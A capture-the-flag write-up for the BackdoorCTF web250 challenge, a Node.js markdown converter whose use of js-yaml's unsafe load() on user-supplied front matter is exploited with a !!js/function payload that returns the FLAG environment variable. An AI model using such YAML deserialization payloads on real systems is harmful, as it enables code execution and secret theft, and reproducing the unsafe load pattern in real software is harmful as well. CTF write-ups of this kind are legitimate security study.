Markdown to HTML Convertor
Our special markdown convertor supports yaml-frontmatter and underscore style templating.
https://backdoor-web250.herokuapp.com/
This problem is almost identical to another BackdoorCTF web100 challenge and also povides its source code.
curl 'https://backdoor-web250.herokuapp.com/'
<html> <head> <title>Markdown to HTML Convertor</title> <style rel="stylesheet" type="text/cs" href="//cdnjs.cloudflare.com/ajax/libs/normalize/3.0.0/normalize.min.css"></style> </head> <body> <h1>Markdown to HTML Convertor</h1> <form action="/convert" method="POST"> <p>Our special markdown convertor supports yaml-frontmatter and underscore style templating.</p> <textarea name="markdown" rows="30" cols="70" placeholder="Enter markdown here">...</textarea> <br> <input type="submit" value="Convert!"> </form> <p>Source code for this is available at https://github.com/backdoor-ctf/web250</p> </body> </html>
Just like the previous problem, app.js contains a line exposing the process.env.FLAG variable which we need to expose again
// development only if ('development' == app.get('env')) { app.use(express.errorHandler()); } if(!process.env.FLAG) { console.error("No flag in environment"); process.exit(1); }
index.js handles parsing/processing submitted content...
var md = require( "markdown" ).markdown; var yml = require('js-yaml'); Mustache=require("mustache"); exports.index = function(req, res){ res.sendfile("public/index.html"); }; exports.convert = function(req, res){ var markdown = req.body.markdown; var yaml = ''; var data = null; if(markdown.slice(0,3)==='---') { var end = markdown.indexOf('---',3); if(end>-1){ yaml = markdown.slice(3,end); try{ data = yml.load(yaml); } catch(e){ res.send("Incorrect YAML"); return; } markdown = markdown.slice(end+3); } //No closing --- were found else markdown=markdown.slice(3); } //Now we template it up: var content = Mustache.render(markdown, data) res.send(md.toHTML(content)); };
The most important line of code here is "data = yml.load(yaml);" which explains exactly how inputs are processed. A quick read through the js-yaml github popped up a very interesting description of yml.load though...
Don't mind if I do...
--- function: !!js/function > function foobar() { return process.env.FLAG; } --- {{function}}
Flag: fb1f85e4f37eb3bf31141cb1dcce1caf